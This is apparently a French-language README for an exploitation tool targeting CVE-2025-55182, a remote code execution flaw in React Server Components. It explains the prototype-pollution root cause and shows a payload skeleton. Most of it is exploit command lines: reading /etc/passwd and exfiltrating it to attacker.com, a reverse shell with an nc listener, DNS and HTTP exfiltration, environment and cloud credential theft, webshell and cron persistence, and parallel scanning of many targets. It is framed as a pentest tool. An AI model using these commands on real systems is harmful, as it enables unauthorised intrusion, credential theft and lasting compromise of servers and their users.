
Outil d'exploitation React2Shell (CVE-2025-55182)
Cadre d'exploitation pour CVE-2025-55182 (React2Shell) – Vulnérabilité critique d'exécution de code à distance dans React Server Components.
# Clone repository
git clone https://github.com/scumfrog/fiberbreak
cd fiberbreak
# Install dependencies
pip install -r requirements.txt
# Make executable
chmod +x fiberbreak.py
# Build vulnerable testing environment
docker-compose up -d
# Wait for startup
sleep 20
# Test detection
./fiberbreak.py -u http://localhost:3000 detect
# Execute RCE
./fiberbreak.py -u http://localhost:3000 exploit -c "whoami"
# Verify
docker exec react2shell-lab ls -la /tmp/
CVE-2025-55182 est une vulnérabilité critique d'exécution de code à distance dans React Server Components (RSC) qui permet à des attaquants non authentifiés d'exécuter du code arbitraire sur le serveur.
Cause racine : Le protocole React Flight désérialise les entrées client non fiables sans validation appropriée, permettant aux attaquants de créer des charges utiles malveillantes qui abusent de la chaîne de prototypes de JavaScript et du constructeur Function.
Vecteur d'attaque : Les attaquants envoient une requête POST multipart/form-data forgée avec un en-tête Next-Action à n'importe quel point de terminaison RSC. La charge utile malveillante exploite :
__proto__constructor:constructor1. Attaquant envoie une requête POST forgée
└─ multipart/form-data avec JSON malveillant
└─ En-tête Next-Action (n'importe quelle valeur)
2. Le serveur désérialise la charge utile
└─ React traite le format de chunk RSC
└─ Résout l'objet de type Promise
3. La chaîne de gadgets se déclenche
└─ L'accès __proto__ contourne les vérifications hasOwnProperty
└─ constructor:constructor expose Function()
└─ _prefix exécute du code arbitraire
4. RCE obtenue
└─ Le serveur exécute le JavaScript de l'attaquant
└─ Compromission totale du système
{
"then": "$1:__proto__:then", // Prototype pollution
"status": "resolved_model", // Fake React internal state
"reason": -1, // Trigger resolution
"value": '{"then":"$B1337"}', // Blob reference
"_response": {
"_prefix": "MALICIOUS_CODE_HERE;", // Executed code
"_formData": {
"get": "$1:constructor:constructor" // Function() access
}
}
}
// react-server-dom-webpack/src/ReactFlightClient.js
function resolveModelChunk(chunk) {
const value = JSON.parse(chunk.value);
// Missing validation here allows malicious chunks
if (value && typeof value.then === 'function') {
// Attacker controls 'then' method
value.then(/* ... */);
}
}
# Single target detection
./fiberbreak.py -u https://target.com detect
# Multiple targets from file
./fiberbreak.py -l targets.txt detect --threads 20
# Save results to JSON
./fiberbreak.py -l targets.txt detect -o results.json
# Disable SSL verification
./fiberbreak.py -u https://target.com detect --no-verify-ssl
# Simple blind command execution
./fiberbreak.py -u https://target.com exploit -c "whoami"
# Write file to disk
./fiberbreak.py -u https://target.com exploit \
-c "/tmp/pwned.txt:HACKED" -t write_file
# Read file contents
./fiberbreak.py -u https://target.com exploit \
-c "/etc/passwd:https://attacker.com" -t file_read
# Reverse shell
./fiberbreak.py -u https://target.com exploit \
-c "10.10.10.10:4444" -t reverse_shell
# DNS exfiltration (stealthy, no HTTP traffic)
./fiberbreak.py -u https://target.com exploit \
-c "whoami:attacker.oastify.com" -t dns_exfil
# HTTP exfiltration with output
./fiberbreak.py -u https://target.com exploit \
-c "id:https://attacker.com/exfil" -t http_exfil
# Environment variable dump
./fiberbreak.py -u https://target.com exploit \
-c "https://attacker.com/env" -t env_dump
# System reconnaissance
./fiberbreak.py -u https://target.com exploit \
-c "https://attacker.com/recon" -t recon
# Stealth DNS beacon (no command output)
./fiberbreak.py -u https://target.com exploit \
-c "attacker.oastify.com" -t stealth_beacon
# Auto-detect cloud provider and extract credentials
# Supports: AWS, GCP, Azure, DigitalOcean, Oracle Cloud, Alibaba Cloud
./fiberbreak.py -u https://target.com exploit \
-c "https://attacker.com/cloud" -t cloud_metadata
| Type | Format | Description | Sortie |
|---|---|---|---|
simple | command | Exécute n'importe quelle commande shell | Aveugle |
output | command + --callback | Exécute avec rappel HTTP | Oui |
reverse_shell | lhost:lport | Reverse shell Bash | Interactive |
dns_exfil | cmd:domain ou domain | Exfiltration DNS | Journaux DNS |
http_exfil | cmd:callback_url | Exfiltration HTTP | POST HTTP |
file_read | filepath:callback | Lit et exfiltre un fichier | POST HTTP |
write_file | filepath:content | Écrit un fichier sur le disque | Aveugle |
env_dump | callback_url | Décharge les variables d'environnement | POST HTTP |
cloud_metadata | callback_url | Extrait les identifiants cloud | POST HTTP |
recon | callback_url | Reconnaissance système | POST HTTP |
stealth_beacon | domain | Balise DNS | Journaux DNS |
webshell | filepath | Déploie une webshell Node.js | Port 8080 |
persist | callback_url | Installe une persistance cron | Tâche cron |
# 1. Détection furtive avec balise DNS
./fiberbreak.py -u https://target.com exploit \
-c "recon.yourburp.oastify.com" -t stealth_beacon
# 2. Si vulnérable, extraction de données sensibles
./fiberbreak.py -u https://target.com exploit \
-c "https://yourserver.com/exfil" -t env_dump
# 3. Vérification de l'environnement cloud
./fiberbreak.py -u https://target.com exploit \
-c "https://yourserver.com/cloud" -t cloud_metadata
# 4. Documenter les résultats sans causer de dommages
# Phase 1 : Détection
./fiberbreak.py -u https://target.com detect -o detection.json
# Phase 2 : Vérification
./fiberbreak.py -u https://target.com exploit \
-c "/tmp/pentest_proof.txt:PENTEST_$(date +%s)" -t write_file
# Phase 3 : Évaluation d'impact
./fiberbreak.py -u https://target.com exploit \
-c "https://pentest-server.com/impact" -t recon
# Phase 4 : Extraction d'identifiants (si cloud)
./fiberbreak.py -u https://target.com exploit \
-c "https://pentest-server.com/creds" -t cloud_metadata
# Phase 5 : Accès interactif (si autorisé)
# Terminal 1 : Démarrer un listener
nc -lvnp 4444
# Terminal 2 : Obtenir un shell
./fiberbreak.py -u https://target.com exploit \
-c "YOUR_IP:4444" -t reverse_shell
# Create target list
cat > targets.txt << EOF
https://app1.company.com
https://app2.company.com
https://app3.company.com
https://api.company.com
EOF
# Scan all targets in parallel
./fiberbreak.py -l targets.txt detect --threads 50 -o scan_results.json
# Filter vulnerable targets
cat scan_results.json | jq '.[] | select(.vulnerable==true) | .url'